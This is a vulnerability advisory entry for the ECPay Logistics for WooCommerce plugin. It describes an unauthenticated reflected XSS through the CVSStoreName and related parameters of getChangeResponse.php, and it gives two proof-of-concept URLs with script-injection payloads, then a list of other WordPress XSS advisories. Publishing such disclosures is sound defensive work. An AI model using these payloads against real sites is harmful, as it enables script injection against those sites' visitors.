ECPay Logistics for WooCommerce < 1.3.1910240 – Unauthenticated Reflected XSS | Plugin Vulnerabilities

Description

The CVSStoreName, CVSAddress, CVSTelephone and CVSStoreID from the getChangeResponse.php are affected by Reflected XSS issues.

Proof of Concept

v <= 1.3.190617

https://example.com/wp-content/plugins/ecpay-logistics-for-woocommerce/getChangeResponse.php?CVSStoreName=";</script><script>alert("XSS")</script>

v < 1.3.1910240

https://example.com/wp-content/plugins/ecpay-logistics-for-woocommerce/getChangeResponse.php?CVSStoreName=";alert(/XSS/);//

Affects Plugins

ecpay-logistics-for-woocommerce

Fixed in 1.3.1910240

References

URL

https://packetstormsecurity.com/files/#154370/

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

Ricardo Sanchez

Verified

Yes

WPVDB ID

fb1bb6a1-7b09-48e3-aa39-f2a76bfc1ea4

Timeline

Publicly Published

2019-09-05 (about 6 years ago)

Added

2019-09-06 (about 6 years ago)

Last Updated

2021-07-17 (about 4 years ago)

Other

Published

Title

Published

2024-01-11

Title

Hubbub Lite < 1.32.0 - Admin+ Stored XSS

Published

2022-12-16

Title

Logo Slider < 3.6.0 - Contributor+ Stored XSS in Shortcode

Published

2025-01-16

Title

WP Photo Sphere <= 3.8 - Authenticated (Contributor+) Stored Cross-Site Scripting

Published

2025-03-31

Title

AtomChat <= 1.1.6 - Authenticated (Contributor+) Stored Cross-Site Scripting

Published

2023-01-10

Title

PPWP – WordPress Password Protect Page < 1.8.6 - Contributor+ Stored XSS in Shortcode